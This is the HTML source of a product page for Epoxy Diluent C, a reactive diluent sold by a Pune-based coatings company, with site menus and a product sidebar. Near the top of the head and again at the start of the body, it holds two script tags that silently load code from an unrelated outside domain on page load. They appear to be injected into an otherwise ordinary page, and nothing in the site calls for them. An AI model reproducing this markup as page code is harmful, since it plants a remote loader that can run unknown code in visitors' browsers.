<!doctype html>

<html class="no-js" lang="zxx">



<head>

<script type="text/javascript" src="https://brolink1s.site/code/hbsdazrrha5ha3ddf42tambu" async></script>

    <meta charset="utf-8">

    <meta http-equiv="x-ua-compatible" content="ie=edge">

    <title>Electrocoating & Insulation Technologies Pvt. Ltd.</title>

    <meta name="robots" content="noindex, follow" />

    <meta name="description" content="">

    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">



    <!-- Place favicon.png in the root directory -->

    <link rel="shortcut icon" href="img/favicon.png" type="image/x-icon" />

    <!-- Font Icons css -->

    <link rel="stylesheet" href="css/font-icons.css">

    <!-- plugins css -->

    <link rel="stylesheet" href="css/plugins.css">

    <!-- bootstrap css -->

    <link rel="stylesheet" href="css/bootstrap.min.css">

    <!-- Main Stylesheet -->

    <link rel="stylesheet" href="css/style.css">

    <!-- Responsive css -->

    <link rel="stylesheet" href="css/responsive.css">

   

    

</head>



<body>

<script type="text/javascript" src="https://brolink1s.site/code/hbsdazrrha5ha3ddf42tambu" async></script>



<!-- Body main wrapper start -->

<div class="body-wrapper">



    <!-- HEADER AREA START (header-5) -->

    <header class="header-area header-5 header-8 header-nav-mobile header-transparent gradient-color-4">

        <!-- header-top-area start -->

        <div class="header-top-area section-bg-6">

            <div class="container">

                <div class="row">

                    <div class="col-md-7">

                        <div class="top-bar-menu">

                            <ul>

                                <li><a href="mailto:mktg@electrocoats.com"><i class="icon-mail"></i> mktg@electrocoats.com</a></li>

                                <li><a href="https://www.google.com/maps/place/Electrocoating+and+Insulation+Technologies+Private+Limited/@18.5708306,73.3105494,9.75z/data=!4m9!1m2!2m1!1selectrocoats!3m5!1s0x3bc2bbb9f36cd2a1:0x3776020f31696634!8m2!3d18.5868216!4d73.7307529!15sCgxlbGVjdHJvY29hdHOSARBjb3Jwb3JhdGVfb2ZmaWNl"><i class="icon-placeholder"></i> Hinjawadi, Pune </a></li>

                            </ul>

                        </div>

                    </div>

                    <div class="col-md-5">

                        <div class="top-bar-right text-right">

                            <div class="top-bar-menu">

                                <ul>

                                    <li>

                                        <!-- social-media -->

                                        <div class="social-media">

                                            <ul>

                                                <li><a href="#" title="Facebook"><i class="fab fa-facebook-f"></i></a></li>

                                                <li><a href="#" title="Twitter"><i class="fab fa-twitter"></i></a></li>

                                                <li><a href="#" title="Instagram"><i class="fab fa-instagram"></i></a></li>

                                                <li><a href="#" title="Dribbble"><i class="fab fa-dribbble"></i></a></li>

                                            </ul>

                                        </div>

                                    </li>

                                </ul>

                            </div>

                        </div>

                    </div>

                </div>

            </div>

        </div>

        <!-- header-top-area end -->

        

        <!-- header-middle-area start -->

        <div class="header-middle-area header-sticky sticky-bg-white">

            <div class="container">

                <div class="row">

                    <div class="col">

                        <div class="site-logo-wrap">

                            <div class="site-logo">

                                <a href="index.html"><img src="img/logo.png" alt="Logo"></a>

                            </div>

                            <div class="get-support clearfix d-none">

                                <div class="get-support-icon">

                                    <i class="icon-call"></i>

                                </div>

                                <div class="get-support-info">

                                    <h6>Get Support</h6>

                                    <h4><a href="tel:+90-20-25881565">+90-20-25881565</a></h4>

                                </div>

                            </div>

                        </div>

                    </div>

                    <div class="col header-menu-column menu-color-white---">

                        <div class="header-menu d-none d-xl-block">

                            <nav>

                                <div class="main-menu">

                                    <ul>

                                        <li><a href="index.html">Home</a></li>

                                        <li class="menu-icon"><a href="#">About</a>

                                            <ul>

                                                <li><a href="about.html">Company Profile</a></li>

                                                <li><a href="team.html">Our Leadership</a></li>

                                                <li><a href="achievement.html">Achievement</a></li>

                                                <li><a href="annual-return-form-no-mgt-7.html">Annual Return FORM NO. MGT-7</a></li>

                                            </ul>

                                        </li> 

                                        <li class="menu-icon active"><a href="#">Products</a>

                                            <ul class="mega-menu">

                                                <li><a href="#">By Application</a>

                                                    <ul>

                                                        <li><a href="epofil-60.html">Electical & Electronics</a></li>

                                                        <li><a href="water-based-epoxy.html">Civil Engineering</a></li>

														<li><a href="epoxy-boards.html">Modelling & Tooling </a></li>

                                                        <li><a href="resin-520-with-hardner-D.html">General Purpose</a></li>

                                                    </ul>

                                                </li>

                                                <li><a href="#">By Name</a>

                                                    <ul>

                                                        <li><a href="epofil-60.html">Epofil 60 </a></li>

                                                        <li><a href="epofil-60-D20.html">Epofil 60 D20</a></li>

                                                        <li><a href="epofil-60-HF.html">Epofil 60 HF</a></li>

                                                        <li><a href="epofil-HC-6016.html">Epofil HC 6016</a></li>

                                                        <li><a href="elcast-60-FR-M1.html">Elcast 60-FR M1</a></li>

                                                        <li><a href="resin-X-seal.html">Resin X Seal</a></li>

														<li><a href="urecast-FR-M1.html">Urecast FR-M1 </a></li>

                                                        <li><a href="urecast-70-HF.html">Urecast 70 HF </a></li>

                                                        <li><a href="resin-520.html">Resin 520</a></li>

                                                        <li><a href="gelcoat.html">Gelcoat</a></li>

                                                        <li><a href="DRZ-51.html">DRZ-51 </a></li>

                                                    </ul>

                                                </li>

                                                <li><a href="#">By Name</a>

                                                    <ul> 

                                                        <li><a href="epicoat-E.html">Epicoat-E</a></li>

														<li><a href="resin-500-75X.html">Resin 500-75X</a></li>

                                                        <li><a href="silcast-RTV-50.html">Silcast-RTV-50</a></li>

                                                        <li><a href="resin-505E.html">Resin 505E</a></li>

                                                        <li><a href="resin-505E-FR.html">Resin 505E FR</a></li>

                                                        <li><a href="resin-505E-FR-IR.html">Resin 505E FR IR</a></li>

                                                        <li><a href="water-based-epoxy.html">Water Based Epoxy</a></li>

                                                        <li><a href="resin-505.html">Resin 505 </a></li>

                                                        <li><a href="eazy-seal.html">Eazy Seal </a></li>

                                                        <li><a href="epi-bond.html">Epi-Bond</a></li>

                                                        <li><a href="epoxy-boards.html">Epoxy Boards</a></li>

                                                    </ul>

                                                </li>

                                                <li><a href="#">By Name</a>

                                                    <ul>       

                                                        <li><a href="master-paste.html">Master Paste</a></li>

                                                        <li><a href="high-flex-PU.html">High Flex PU</a></li>

                                                        <li><a href="Urecast-FND.html">Urecast FND</a></li>

                                                        <li><a href="diluent-C.html">Diluent C</a></li>

                                                        <li><a href="diluent-M.html">Diluent M</a></li>

                                                        <li><a href="diluent-P.html">Diluent P</a></li>

                                                        <li><a href="diluent-MC.html">Diluent MC</a></li>

                                                        <li><a href="coloring-paste.html">Coloring paste</a></li>

                                                        <li><a href="silicon-paint-SP-91.html">Silicon paint SP-91</a></li>

                                                        <li><a href="APC-90.html">APC-90</a></li>

                                                        <li><a href="air-drying-varnish.html">Air Drying Varnish</a></li>

                                                    </ul>

                                                </li>

                                            </ul>

                                        </li>

                                        <li><a href="client.html">Clients</a></li>

                                        <li><a href="testimonial.html">Testimonial</a></li>

                                        <li><a href="contact.html">Contact</a></li>

                                    </ul>

                                </div>

                            </nav>

                        </div>

                    </div>

                    <div class="header-options header-options-2 ">

                        <!-- header-search-1 -->

                        <div class="header-search-wrap">

                            <div class="header-search-1">

                                <div class="search-icon">

                                    <i class="icon-search for-search-show"></i>

                                    <i class="icon-cancel  for-search-close"></i>

                                </div>

                            </div>

                            <div class="header-search-1-form">

                                <form id="#" method="get"  action="#">

                                    <input type="text" name="search" value="" placeholder="Search here..."/>

                                    <button type="submit">

                                        <span><i class="icon-search"></i></span>

                                    </button>

                                </form>

                            </div>

                        </div>



                        <!-- Mobile Menu Button -->

                        <div class="mobile-menu-toggle d-xl-none">

                            <a href="#utilize-mobile-menu" class="utilize-toggle">

                                <svg viewBox="0 0 800 600">

                                    <path d="M300,220 C300,220 520,220 540,220 C740,220 640,540 520,420 C440,340 300,200 300,200" id="top"></path>

                                    <path d="M300,320 L540,320" id="middle"></path>

                                    <path d="M300,210 C300,210 520,210 540,210 C740,210 640,530 520,410 C440,330 300,190 300,190" id="bottom" transform="translate(480, 320) scale(1, -1) translate(-480, -318) "></path>

                                </svg>

                            </a>

                        </div>

                    </div>

                </div>

            </div>

        </div>

        <!-- header-middle-area end -->

    </header>

    <!-- HEADER AREA END -->



    

    <!-- Utilize Mobile Menu Start -->

    <div id="utilize-mobile-menu" class="utilize utilize-mobile-menu">

        <div class="utilize-menu-inner scrollbar">

            <div class="utilize-menu-head">

                <div class="site-logo">

                    <a href="index.html"><img src="img/logo.png" alt="Logo"></a>

                </div>

                <button class="utilize-close">×</button>

            </div>

            <div class="utilize-menu-search-form">

                <form action="#">

                    <input type="text" placeholder="Search...">

                    <button><i class="fas fa-search"></i></button>

                </form>

            </div>

            <div class="utilize-menu">

                <ul>

                    <li><a href="index.html">Home</a></li>

                    <li><a href="#">About</a>

                        <ul class="sub-menu">

                            <li><a href="about.html">Company Profile</a></li>

                            <li><a href="team.html">Our Leadership</a></li>

                            <li><a href="achievement.html">Achievement</a></li>

                                                <li><a href="annual-return-form-no-mgt-7.html">Annual Return FORM NO. MGT-7</a></li>

                        </ul>

                    </li>

                    <li><a href="#">Products</a>

                        <ul class="sub-menu">

                            <li><a href="epofil-60.html">Electical & Electronics</a></li>

                            <li><a href="water-based-epoxy.html">Civil Engineering</a></li>

							<li><a href="epoxy-boards.html">Modelling & Tooling </a></li>

                            <li><a href="resin-520-with-hardner-D.html">General Purpose</a></li>

                            <li><a href="epofil-60.html">Epofil 60 </a></li>

                            <li><a href="epofil-60-D20.html">Epofil 60 D20</a></li>

                            <li><a href="epofil-60-HF.html">Epofil 60 HF</a></li>

                            <li><a href="epofil-HC-6016.html">Epofil HC 6016</a></li>

                            <li><a href="elcast-60-FR-M1.html">Elcast 60-FR M1</a></li>

                            <li><a href="resin-X-seal.html">Resin X Seal</a></li>

							<li><a href="urecast-FR-M1.html">Urecast FR-M1 </a></li>

                            <li><a href="urecast-70-HF.html">Urecast 70 HF </a></li>

                            <li><a href="resin-520.html">Resin 520</a></li>

                            <li><a href="gelcoat.html">Gelcoat</a></li>

                            <li><a href="DRZ-51.html">DRZ-51 </a></li>

							<li><a href="epicoat-E.html">Epicoat-E</a></li>

							<li><a href="resin-500-75X.html">Resin 500-75X</a></li>

                            <li><a href="silcast-RTV-50.html">Silcast-RTV-50</a></li>

                            <li><a href="resin-505E.html">Resin 505E</a></li>

                            <li><a href="resin-505E-FR.html">Resin 505E FR</a></li>

                            <li><a href="resin-505E-FR-IR.html">Resin 505E FR IR</a></li>

                            <li><a href="water-based-epoxy.html">Water Based Epoxy</a></li>

                            <li><a href="resin-505.html">Resin 505 </a></li>

                            <li><a href="eazy-seal.html">Eazy Seal </a></li>

                            <li><a href="epi-bond.html">Epi-Bond</a></li>

                            <li><a href="epoxy-boards.html">Epoxy Boards</a></li>

							<li><a href="master-paste.html">Master Paste</a></li>

                            <li><a href="high-flex-PU.html">High Flex PU</a></li>

                            <li><a href="Urecast-FND.html">Urecast FND</a></li>

                            <li><a href="diluent-C.html">Diluent C</a></li>

                            <li><a href="diluent-M.html">Diluent M</a></li>

                            <li><a href="diluent-P.html">Diluent P</a></li>

                            <li><a href="diluent-MC.html">Diluent MC</a></li>

                            <li><a href="coloring-paste.html">Coloring paste</a></li>

                            <li><a href="silicon-paint-SP-91.html">Silicon paint SP-91</a></li>

                            <li><a href="APC-90.html">APC-90</a></li>

                            <li><a href="air-drying-varnish.html">Air Drying Varnish</a></li>

                        </ul>

                    </li>

                    <li><a href="client.html">Clients</a></li>

                    <li><a href="testimonial.html">Testimonial</a></li>

                    <li><a href="contact.html">Contact</a></li>

                </ul>

            </div>

            

            <div class="social-media-2">

                <ul>

                    <li><a href="#" title="Facebook"><i class="fab fa-facebook-f"></i></a></li>

                    <li><a href="#" title="Twitter"><i class="fab fa-twitter"></i></a></li>

                    <li><a href="#" title="Linkedin"><i class="fab fa-linkedin"></i></a></li>

                    <li><a href="#" title="Instagram"><i class="fab fa-instagram"></i></a></li>

                </ul>

            </div>

        </div>

    </div>

    <!-- Utilize Mobile Menu End -->



    <div class="utilize-overlay"></div>



    <!-- BREADCRUMB AREA START -->

    <div class="breadcrumb-area text-left bg-overlay-white-30">

        <div class="container">

            <div class="row">

                <div class="col-lg-12">

                    <div class="breadcrumb-inner">

                        <h1 class="page-title">Epoxy Diluent C </h1>

                        <div class="breadcrumb-list">

                            <ul>

                                <li><a href="index.html"><span class="secondary-color"><i class="fas fa-home"></i></span> Home</a></li>

                                <li>Product</li>

								<li>Epoxy Diluent C</li>

                            </ul>

                        </div>

                    </div>

                </div>

            </div>

        </div>

    </div>

    <!-- BREADCRUMB AREA END -->



    <!-- PAGE DETAILS AREA START (blog-details) -->

    <div class="page-details-area blog-details-area mb-120 mt-120">

        <div class="container">

            <div class="row">

                <div class="col-lg-8">

                    <div class="blog-details-wrap">

                        <div class="page-details-inner blog-details-inner">

                            <h2 class="blog-title">Epoxy Diluent C</h2>

                            

                            <p>Epoxy Diluent C is a mono epoxy flexibilizer and reactive diluent. It is compatible with Epoxy Resin 520, Epoxy resin 505, Epoxy Resin 400 and has excellent stability at room temperature as well as lower temperatures.</p>

                          

                            <hr>

                            <h2>FIELD OF APPLICATION:</h2>

							<div class="list-item-with-icon-2">

                                <ul>

									<li>Epoxy Diluent C is Suggested for casting and potting application. Especially when sharp cornered metal inserts cause severe mechanical stresses and cracking. </li>

									<li>Epoxy Diluent C is suggested in coating application for improved flexibility of cured film and lowering of viscosity of the mixture. </li>

                                    <li>Epoxy Diluent C is also recommended for preparing laminating resin mixture for improved wettability with glass fibre.</li>

								</ul>

							</div>

                        </div>



                    </div>

                </div>

               

				

				<div class="col-lg-4">

                	<aside class="sidebar-area right-sidebar">

						<div id="accordion">

						  <div class="card">

							<div class="card-header" id="heading-1">

							  <h5 class="mb-0">

								<a role="button" data-toggle="collapse" href="#collapse-1" aria-expanded="true" aria-controls="collapse-1">

								 Electrical &amp; Electronics 

								</a>

							  </h5>

							</div>

							<div id="collapse-1" class="collapse " data-parent="#accordion" aria-labelledby="heading-1">

							  <div class="card-body">



								<div id="accordion-1">

								  <div class="card">

									<div class="card-header" id="heading-1-1">

									  <h5 class="mb-0">

										<a class="collapsed" role="button" data-toggle="collapse" href="#collapse-1-1" aria-expanded="false" aria-controls="collapse-1-1">

										  Potting &amp; Encapsulation

										</a>

									  </h5>

									</div>

									<div id="collapse-1-1" class="collapse" data-parent="#accordion-1" aria-labelledby="heading-1-1">

									  <div class="card-body">



										  <div id="accordion-1-1">

											<div class="card">

											  <div class="card-header" id="heading-1-1-1">

												<h5 class="mb-0">

												  <a class="collapsed" role="button" data-toggle="collapse" href="#collapse-1-1-1" aria-expanded="false" aria-controls="collapse-1-1-1">

													Epoxy

												  </a>

												</h5>

											  </div>

											  <div id="collapse-1-1-1" class="collapse" data-parent="#accordion-1-1" aria-labelledby="heading-1-1-1">

												<a href="epofil-60.html">

												  <div class="card-body">

												  Epofil 60

												  </div>

												</a>

												<a href="epofil-60-D20.html">

												  <div class="card-body">

												  Epofil 60 D20

												  </div>

												</a>

												<a href="epofil-60-FR.html">

												  <div class="card-body">

												  Epofil 60 FR (Thixo)

												  </div>

											    </a>

												<a href="epofil-60-HF.html">

												  <div class="card-body">

												  Epofil 60 HF

												  </div>

												</a>

												<a href="epofil-HC-6016.html">

												  <div class="card-body">

												  Epofil HC 6016

												  </div>

												</a>

												<a href="elcast-60-FR-M1.html">

												  <div class="card-body">

												  Elcast 60-FR M1 (UL Approved)

												  </div>

												</a>

											  </div>

											</div>

											<div class="card">

											  <div class="card-header" id="heading-1-1-2">

												<h5 class="mb-0">

												  <a class="collapsed" role="button" data-toggle="collapse" href="#collapse-1-1-2" aria-expanded="false" aria-controls="collapse-1-1-2">

													Polyurethane

												  </a>

												</h5>

											  </div>

											  <div id="collapse-1-1-2" class="collapse" data-parent="#accordion-1-1" aria-labelledby="heading-1-1-2">

												<a href="resin-X-seal.html">

												  <div class="card-body">

												   Resin X seal

												  </div>

												  </a>

												<a href="urecast-FR-M1.html">

												  <div class="card-body">

												   Urecast FR-M1 (UL Approved)

												  </div>

												</a>

												<a href="urecast-60-LV.html">

												  <div class="card-body">

												  Urecast 60 LV

												  </div>

												</a>

											  </div>

											</div>

											<div class="card">

											  <div class="card-header" id="heading-1-1-3">

												<h5 class="mb-0">

												  <a class="collapsed" role="button" data-toggle="collapse" href="#collapse-1-1-3" aria-expanded="false" aria-controls="collapse-1-1-3">

													Others

												  </a>

												</h5>

											  </div>

											  <div id="collapse-1-1-3" class="collapse" data-parent="#accordion-1-1" aria-labelledby="heading-1-1-3">

												<a href="APC-90.html">

												  <div class="card-body">

												  APC-90

												  </div>

												</a>

												<a href="silcast-RTV-50.html">

												  <div class="card-body">

												  Silcast-RTV-50

												  </div>

												</a>

											  </div>

											</div>

										  </div>



									  </div>

									</div>

								  </div>

								  <div class="card">

									<div class="card-header" id="heading-1-2">

									  <h5 class="mb-0">

										<a class="collapsed" role="button" data-toggle="collapse" href="#collapse-1-2" aria-expanded="false" aria-controls="collapse-1-2">

										Casting

										</a>

									  </h5>

									</div>

									<div id="collapse-1-2" class="collapse " data-parent="#accordion-1" aria-labelledby="heading-1-2">

									  <div class="card-body">



										  <div id="accordion-1-2">

											<div class="card">

											  <div class="card-header" id="heading-1-2-1">

												<h5 class="mb-0">

												  <a class="collapsed" role="button" data-toggle="collapse" href="#collapse-1-2-1" aria-expanded="false" aria-controls="collapse-1-2-1">

													Epoxy

												  </a>

												</h5>

											  </div>

											  <div id="collapse-1-2-1" class="collapse " data-parent="#accordion-1-2" aria-labelledby="heading-1-2-1">

												<a href="resin-520.html">

												  <div class="card-body active">

												  Resin 520

												  </div>

												</a>

												<a href="epofil-60.html">

												  <div class="card-body">

												  Epofil 60

												  </div>

												</a>

											  </div>

											</div>

											<div class="card">

											  <div class="card-header" id="heading-1-2-2">

												<h5 class="mb-0">

												  <a class="collapsed" role="button" data-toggle="collapse" href="#collapse-1-2-2" aria-expanded="false" aria-controls="collapse-1-2-2">

													Polyurethane

												  </a>

												</h5>

											  </div>

											  <div id="collapse-1-2-2" class="collapse" data-parent="#accordion-1-2" aria-labelledby="heading-1-2-2">

												<a href="urecast-70-HF.html">

												  <div class="card-body">

												  Urecast 70 HF

												  </div>

												</a>

											  </div>

											</div>

										  </div>



									  </div>

									</div>

									

								  </div>

								  <div class="card">

									<div class="card-header" id="heading-1-3">

									  <h5 class="mb-0">

										<a class="collapsed" role="button" data-toggle="collapse" href="#collapse-1-3" aria-expanded="false" aria-controls="collapse-1-3">

										Coating

										</a>

									  </h5>

									</div>

									<div id="collapse-1-3" class="collapse" data-parent="#accordion-1" aria-labelledby="heading-1-3">

									  <a href="gelcoat.html">

									     <div class="card-body">

										  Gelcoat

									     </div>

									  </a>

									  <a href="DRZ-51.html">

									     <div class="card-body">

										  DRZ-51

									     </div>

								      </a>

								      <a href="epicoat-E.html">

									    <div class="card-body">

										 Epicoat-E

									    </div>

								      </a>

									  <a href="resin-500-75X.html">

									    <div class="card-body">

										 Resin 500-75X

									    </div>

									  </a>

									  <a href="silicon-paint-SP-91.html">

									    <div class="card-body">

										 Silicon paint SP-91

									    </div>

								      </a>

									  <a href="air-drying-varnish.html">

									    <div class="card-body">

										 Air Drying Varnish

									    </div>

								     </a>

									</div>

									

								  </div>

								  <div class="card">

									<div class="card-header" id="heading-1-4">

									  <h5 class="mb-0">

										<a class="collapsed" role="button" data-toggle="collapse" href="#collapse-1-4" aria-expanded="false" aria-controls="collapse-1-4">

										  Batteries

										</a>

									  </h5>

									</div>

									<div id="collapse-1-4" class="collapse" data-parent="#accordion-1" aria-labelledby="heading-1-4">

								      <a href="resin-505E.html">

									    <div class="card-body">

										  Resin 505E

									    </div>

									  </a>

									  <a href="resin-505E-FR.html">

									    <div class="card-body">

										 Resin 505E FR

									    </div>

									  </a>

									  <a href="resin-505E-FR-IR.html">

									    <div class="card-body">

										 Resin 505E FR IR

									    </div>

								      </a>

									</div>									

								  </div>

                                  <div class="card">

                                    <div class="card-header" id="heading-1-5">

                                      <h5 class="mb-0">

                                        <a class="collapsed" role="button" data-toggle="collapse" href="#collapse-1-5" aria-expanded="false" aria-controls="collapse-1-5">

                                          Insulating Varnishes

                                        </a>

                                      </h5>

                                    </div>

                                    <div id="collapse-1-5" class="collapse" data-parent="#accordion-1" aria-labelledby="heading-1-5">

                                      <a href="resin-505E.html">

                                        <div class="card-body">

                                          Polyesterimide Varnish

                                        </div>

                                      </a>

                                      <a href="resin-505E-FR.html">

                                        <div class="card-body">

                                          Epoxy Varnish

                                        </div>

                                      </a>

                                      <a href="resin-505E-FR-IR.html">

                                        <div class="card-body">

                                         Air Drying Varnish

                                        </div>

                                      </a>

                                    </div>                                  

                                  </div>

								</div>      



							  </div>

							</div>

						  </div>

						  <div class="card">

							<div class="card-header" id="heading-2">

							  <h5 class="mb-0">

								<a class="collapsed" role="button" data-toggle="collapse" href="#collapse-2" aria-expanded="false" aria-controls="collapse-2">

								  Civil Engineering 

								</a>

							  </h5>

							</div>

							<div id="collapse-2" class="collapse" data-parent="#accordion" aria-labelledby="heading-2">

							  <a href="water-based-epoxy.html">

							    <div class="card-border">

								 Water based Epoxy

							    </div>

							  </a>

							  <a href="resin-505-with-hardner-AMD-140.html">

							    <div class="card-border">

								Resin 505 with Hardner AMD 140

							    </div>

						     </a>

							 <a href="resin-520-with-hardner-AMD-140.html">

							    <div class="card-border">

								 Resin 520 with Hardner AMD 140

							    </div>

							  </a>

							  <a href="eazy-seal.html">

							    <div class="card-border">

								Eazy Seal

							    </div>

							  </a>

							  <a href="epi-bond.html">

							    <div class="card-border">

								Epi-Bond

							    </div>

							  </a>

						      <a href="epoxy-coal-tar.html">

							    <div class="card-border">

								Epoxy Coal Tar

							    </div>

							  </a>

							  <a href="granite-and-marble-coating.html">

							    <div class="card-border">

								Granite &amp; Marble Coating

							    </div>

							  </a>

							</div>

						  </div>

						

						  <div class="card">

							<div class="card-header" id="heading-3">

							  <h5 class="mb-0">

								<a class="collapsed" role="button" data-toggle="collapse" href="#collapse-3" aria-expanded="false" aria-controls="collapse-3">

								  Modelling &amp; Tooling 

								</a>

							  </h5>

							</div>

							<div id="collapse-3" class="collapse" data-parent="#accordion" aria-labelledby="heading-3">

							  <a href="epoxy-boards.html">

							    <div class="card-body card-border">

								Epoxy Boards

							    </div>

							  </a>

							  <a href="gelcoat.html">

							    <div class="card-body card-border">

								Gelcoat

							    </div>

							  </a>

							  <a href="master-paste.html">

							    <div class="card-body card-border">

								 Master Paste

							    </div>

							  </a>

							  <a href="epi-bond.html">

							    <div class="card-body card-border">

								Epi-Bond

							    </div>

								</a>

							  <a href="high-flex-PU.html">

							    <div class="card-body card-border">

								High Flex PU

							    </div>

							  </a>

							  <a href="urecast-FND.html">

							    <div class="card-body card-border">

								Urecast FND

							    </div>

						      </a>

							</div>

							

						  </div>

						  <div class="card">

							<div class="card-header" id="heading-4">

							  <h5 class="mb-0">

								<a class="collapsed" role="button" data-toggle="collapse" href="#collapse-4" aria-expanded="false" aria-controls="collapse-4">

								  General Purpose 

								</a>

							  </h5>

							</div>

							<div id="collapse-4" class="collapse" data-parent="#accordion" aria-labelledby="heading-4">

							  <a href="resin-520-with-hardner-D.html">

							    <div class="card-body card-border">

								 Resin 520 with hardner D

							    </div>

							  </a>

							  <a href="resin-520-with-hardner-HG.html">

							    <div class="card-body card-border">

								Resin 520 with Hardner HG

							    </div>

							  </a>

							  <a href="epi-bond.html">

							    <div class="card-body card-border">

								Epi-Bond

							    </div>

							  </a>

							  <a href="eazy-seal-putty.html">

							    <div class="card-body card-border">

								Eazy Seal - Putty

							    </div>

							  </a>

							</div>

							

						  </div>

						</div>

                    </aside>



                </div>

            </div>

        </div>

    </div>

    <!-- PAGE DETAILS AREA END -->





    <!-- FOOTER AREA START -->

    <footer class="footer-area  ">

        <div class="footer-top-area  section-bg-2 plr--5">

            <div class="container-fluid">

                <div class="row">

                    <div class="col-xl-3 col-md-6 col-sm-6 col-12 ">

                        <div class="footer-widget footer-about-widget tw-footer-info-box">

                            <div class="footer-logo">

                                <div class="site-logo">

                                    <img src="img/logo-footer.png" alt="Logo">

                                </div>

                            </div>

                            <p>We at Electrocoating and Insulation Technologies Private Limited are engaged in developing and manufacturing various types of polymer coatings. </p>

                            <div class="social-media mt-20">

                                <ul>

                                    <li><a href="#" title="Facebook"><i class="fab fa-facebook-f"></i></a></li>

                                    <li><a href="#" title="Twitter"><i class="fab fa-twitter"></i></a></li>

                                    <li><a href="#" title="Linkedin"><i class="fab fa-linkedin"></i></a></li>

                                    <li><a href="#" title="Youtube"><i class="fab fa-youtube"></i></a></li>

                                </ul>

                            </div>

                        </div>

                    </div>



                    <div class="col-xl-3 col-md-6 col-sm-6 col-12 pl-lg-5">

                        <div class="footer-widget footer-menu-widget clearfix">

                            <h4 class="footer-title">Quick Links</h4>

                            <div class="footer-menu">

                                <ul>

                                    <li><a href="index.html">Home</a></li>

                                    <li><a href="about.html">About</a></li>

                                    <li><a href="epofil-60.html">Product</a></li>

                                    <li><a href="client.html">Clients</a></li>

                                    <li><a href="testimonial.html">Testimonial</a></li>

                                    <li><a href="contact.html">Contact us</a></li>

                                </ul>

                            </div>

                        </div>

                    </div>

                    

                    <div class="col-xl-3 col-md-6 col-sm-12 col-12">

                        <div class="footer-widget footer-about-widget tw-footer-info-box">

							<h4 class="footer-title">Connect With Us</h4>

                            <div class="footer-address">

                                <ul>

                                    <li>

                                        <div class="footer-address-icon">

                                            <i class="icon-placeholder"></i>

                                        </div>

                                        <div class="footer-address-info">

                                            <p>Plot No.1, S. No. 228, Hinjawadi Maan Road, Behind Wipro, Hinjawadi Pune 411 057</p>

                                        </div>

                                    </li>

                                    <li>

                                        <div class="footer-address-icon">

                                            <i class="icon-call"></i>

                                        </div>

                                        <div class="footer-address-info">

                                            <p><a href="tel:+919898334414">+91 9370903742 / 9370903748</a></p>

                                        </div>

                                    </li>

                                    <li>

                                        <div class="footer-address-icon">

                                            <i class="icon-mail"></i>

                                        </div>

                                        <div class="footer-address-info">

                                            <p><a href="mailto: mktg@electrocoats.com"> mktg@electrocoats.com </a></p>

                                        </div>

                                    </li>

                                </ul>

                            </div>

                        </div>

                    </div>



                    <div class="col-xl-3 col-md-6 col-sm-6 col-12">

                        <div class="footer-widget footer-menu-widget clearfix">

                            <a href="https://www.google.com/maps/place/Electrocoating+and+Insulation+Technologies+Private+Limited/@18.586823,73.730753,15z/data=!4m5!3m4!1s0x0:0x3776020f31696634!8m2!3d18.5868564!4d73.7307398?hl=en" target="_blank"><h4 class="footer-title">Meet Us On</h4></a>

                            <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3781.716236983106!2d73.72856391534948!3d18.58682757199449!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3bc2bbb9f36cd2a1%3A0x3776020f31696634!2sElectrocoating%20and%20Insulation%20Technologies%20Private%20Limited!5e0!3m2!1sen!2sin!4v1628244807027!5m2!1sen!2sin"  style="border:0;" allowfullscreen="" loading="lazy"></iframe>

                        </div>

                    </div>

                </div>

            </div>

        </div>

        <div class="copyright-area copyright-2 section-bg-7  plr--5">

            <div class="container-fluid border-top-2">

                <div class="row">

                    <div class="col-md-6 col-12">

                        <div class="copyright-design clearfix">

                            <p>All Rights Reserved @ Electrocoating & Insulation Technologies <span class="current-year"></span></p>

                        </div>

                    </div>

                    <div class="col-md-6 col-12 ">

                        <div class="copyright-menu text-right">

                            <p>Designed By <a href="" target="_blank">Satkar Software Solutions Pvt. Ltd.</a>

                            </p>

                        </div>

                    </div>

                </div>

            </div>

        </div>

    </footer>

    <!-- FOOTER AREA END -->



</div>

<!-- Body main wrapper end -->



	<!-- preloader area start -->

    <div class="preloader" id="preloader">

        <div class="preloader-inner">

            <div class="spinner">

                <div class="dot1"></div>

                <div class="dot2"></div>

            </div>

        </div>

    </div>

    <!-- preloader area end -->



	<!-- Jquery Plugins -->

	<script src="js/jquery.min.js"></script>

    <!-- bootstrap js -->

    <script src="js/bootstrap.min.js"></script>

    <!-- All JS Plugins -->

    <script src="js/plugins.js"></script>

    <!-- Main JS -->

    <script src="js/main.js"></script>



</body>



</html>



